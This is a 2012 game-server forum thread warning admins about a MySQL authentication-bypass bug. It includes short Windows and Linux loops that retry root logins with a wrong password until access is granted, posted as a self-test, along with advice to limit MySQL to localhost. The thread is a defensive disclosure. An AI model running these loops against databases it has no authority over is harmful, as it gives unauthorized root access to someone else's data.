EQEmulator Forums


Hateborne 06-12-2012 02:33 PM

MySQL Stupid Easy Exploit
 
Just throwing this out there, a minor exploit has come up for MySQL.

It affects very few setups from my understanding, but I am still passing this along.

http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve...ous-mysql.html

Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.


To test for this on Windows, take the three commands below and save them into a bat file:
Code:

:Start
mysql -u root --password=lolwut 2>NUL
goto Start

To test for this on Linux, take ONE of these two and pass into terminal:
Code:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Code:

while true; do mysql -u root --password=bad; done

If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to the database until a patch is made available.

-Hate




EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.

pfyon 06-12-2012 10:16 PM

It's a good time to point out to new server admins that you should restrict access to your server to a limited set of IPs. For many servers, this means localhost only. If you go and open up port 3306 and tell MySQL to listen on a public interface, you open up your server to an exploit like this.

The default Ubuntu install has MySQL listen on localhost only (probably Debian too). I'm not sure about Windows.

Hateborne 06-13-2012 04:50 PM

Quote:

Originally Posted by pfyon (Post 210252)
It's a good time to point out to new server admins that you should restrict access to your server to a limited set of IPs. For many servers, this means localhost only. If you go and open up port 3306 and tell MySQL to listen on a public interface, you open up your server to an exploit like this.

The default Ubuntu install has MySQL listen on localhost only (probably Debian too). I'm not sure about Windows.

This brings up a good point. If the MySQL access is restricted to localhost (127.0.0.1) only, this exploit (and others) can only be run if the baddy has access to the machine physically (or has broken in through another exploit/vulnerability).

-Hate


All times are GMT -4.